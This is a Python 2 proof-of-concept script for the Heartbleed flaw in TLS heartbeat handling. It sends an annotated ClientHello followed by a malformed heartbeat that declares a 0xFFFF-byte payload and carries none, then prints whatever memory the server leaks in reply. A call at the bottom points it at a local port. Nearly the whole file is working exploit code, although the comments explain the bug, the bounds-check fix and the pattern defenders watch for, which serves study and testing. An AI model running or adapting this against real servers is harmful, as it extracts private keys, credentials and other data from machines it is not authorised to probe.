import socket
import time
# Annotated hex dump of a TLS ClientHello record (version bytes 03 02, i.e.
# TLS 1.1, per the inline annotation).  Each line holds space-separated hex
# bytes; a ``#`` token starts a comment that ``no_comments`` strips before
# the bytes are sent.  The annotations live inside the string literal, so
# they are only safe to edit in a form that helper still parses.  The hello
# offers two cipher suites (00 33, c0 11), no compression and no extensions.
CLIENT_HELLO = '''
16 03 02 00 31 # TLS Header
01 00 00 2d # Handshake header
03 02 # ClientHello field: version number (TLS 1.1)
50 0b af bb b7
5a b8 3e f0 ab
9a e3 f3 9c 63
15 33 41 37 ac
fd 6c 18 1a 24
60 dc 49 67 c2
fd 96 # ClientHello field: random
00 # ClientHello field: session id
00 04 # ClientHello field: cipher suite length
00 33 c0 11 # ClientHello field: cipher suite(s)
01 # ClientHello field: compression support, length
00 # ClientHello field: compression support, no compression (0)
00 00 # ClientHello field: extension length (0)
'''
# Annotated hex dump of the malformed Heartbeat request at the heart of the
# Heartbleed bug.  The record header says the record is 3 bytes long (type +
# 2-byte payload length), but the payload-length field claims 0xFFFF bytes
# and no payload follows.  An implementation that trusts the declared length
# instead of the record length copies that many bytes out of its own memory
# into the reply; the fix is a bounds check that discards heartbeats whose
# declared length exceeds the record.  Defensive detection keys on exactly
# this mismatch between record length and declared payload length.
BAD_HB = '''
18 # Content type = 18 (Heartbeat message)
03 02 # Version
00 03 # Packet length
01 # Heartbeat message type (1 = request)
FF FF # Payload length
# There is no actual message, just an empty string
'''
def no_comments(p):
    """Convert an annotated hex dump into a raw byte string.

    Each line of *p* is read token by token (split on single spaces).
    Reading of a line stops at the first empty token or at the first token
    beginning with ``#``, so everything after a comment marker -- or after a
    doubled space -- is dropped.  Every token kept is hex-decoded and the
    results are concatenated in order.

    Python 2 only: relies on ``str.decode('hex')``, which raises
    ``TypeError`` for a token that is not valid hex or has odd length.
    """
    decoded_chunks = []
    for line in p.split('\n'):
        for token in line.split(' '):
            if not token or token.startswith('#'):
                break
            decoded_chunks.append(token.decode('hex'))
    return ''.join(decoded_chunks)
def recvall(s, timeout=3):
    """Drain whatever *s* currently has to send and return it as one string.

    Args:
        s: a connected socket; it is switched to non-blocking mode here and
            left that way for the caller.
        timeout: seconds of silence after the first chunk before giving up.
            If nothing at all arrives, the loop gives up after ``2 * timeout``.

    Returns:
        The concatenated chunks read, or an empty string if nothing arrived.
    """
    s.setblocking(0)
    total_data = []
    data = ''
    begin = time.time()
    while True:
        # Two deadlines: once something has arrived, stop after ``timeout``
        # seconds without new data; if nothing ever arrives, wait twice that.
        if total_data and time.time() - begin > timeout:
            break
        elif time.time() - begin > timeout * 2:
            break
        try:
            data = s.recv(8192)
            if data:
                total_data.append(data)
                begin = time.time()  # restart the silence timer on each chunk
            else:
                # An empty read (peer closed) is not treated as end-of-stream;
                # the loop keeps polling until the deadline expires.
                time.sleep(0.1)
        except:
            # Bare except: on a non-blocking socket recv() raises when no data
            # is ready yet, and that is what this is meant to absorb.  It also
            # hides every other error (reset connections, KeyboardInterrupt),
            # so a failed read looks the same as a quiet peer.
            pass
    return ''.join(total_data)
def attack(host, port):
    """Connect to ``host:port``, send the ClientHello, then the malformed
    heartbeat, and print whatever comes back.

    The first ``recvall`` discards the server's handshake response; the
    second captures the heartbeat reply, which is the data of interest.  The
    return value of ``send`` is ignored, so a short send is not detected, and
    the socket is never closed explicitly.  Python 2 only (``print``
    statement, ``str`` payloads).

    Args:
        host: address to connect to.
        port: TCP port to connect to.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(no_comments(CLIENT_HELLO))
    recvall(s)
    s.send(no_comments(BAD_HB))
    print recvall(s)
# Module-level call: importing or running this file immediately runs the
# probe against localhost on port 11443 (presumably a local test instance;
# not a standard TLS port).  There is no ``if __name__ == "__main__"`` guard
# and no argument parsing, so the target is fixed here.
attack('127.0.0.1', 11443)